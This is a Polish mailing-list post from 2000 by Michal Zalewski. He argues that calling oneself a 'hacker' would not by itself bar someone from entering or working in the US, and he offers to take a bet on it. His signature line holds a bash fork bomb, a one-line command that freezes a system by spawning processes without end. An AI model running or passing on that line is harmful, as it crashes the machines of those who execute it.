(no subject)

Autor: Michal Zalewski (lcamtuf_at_dione.ids.pl)
Data: Sun 31 Dec 2000 - 18:11:14 MET

On Sun, 31 Dec 2000, Dariusz Laskowski wrote:

> To nie moja broszka, ale IMHO zakład jest do kitu, bo zależy od tego
> na jakiego urzędasa się trafi (odpowiednik Michala Z. czy Jacka D.);
> więc wygrana czy przegrana niczego nie wyjaśnia.

Polemizowalbym :) Szczesliwie US to nie Polska, i choc istnieje wiele
negatywnych z mojego punktu widzenia roznic, to jednak tzw. urzedasy,
nawet te najnizsze, trzymaja sie pewnych kryteriow, musza motywowac swe
decyzje i uzasadniac je w sposob jawny powolujac sie na konkretne
przepisy. Ja po prostu wierze, ze nie tylko nie ma zakazu wjazdu do obcych
krajow (US/UE ;) dla osob, ktore deklaruja, iz sa wlasnie hackerami
(uzywajac dokladnie tego okreslenia i nie wnikajac w jego znaczenie), ani
ze dla organow typu INS (ktory jest organem decyzyjnym w tych kwestiach ;)
nie jest to jakikolwiek argument :) Chodzi o rozstrzygniecie tego, czy sam
fakt "bycia hackerem" dyskwalifikuje kogos, kto chce np. pracowac w
Stanach (z jednej strony nie redefiniujemy pojecia piszac np: 'mowiac o
sobie, ze jestem hackerem, mam na mysli to, ze lubie ogladac dziecioly w
lesie'; z drugiej chodzi *tylko* o bycie hackerem - nie bycie natomiast
np. osoba karana, bo to oznacza dyskwalifikacje z innego paragrafu, nie
wazne czy potracilem staruszke, czy ukradlem ciasteczko ze sklepu).

Oczywiscie moge sie mylic (GPL) ;) W kazdym razie jesli Expert dalej
podtrzymuje zaklad, jestem gotow w to wejsc i dac w miare obiektywna
odpowiedz ;>

Michal Zalewski [lcamtuf_at_tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=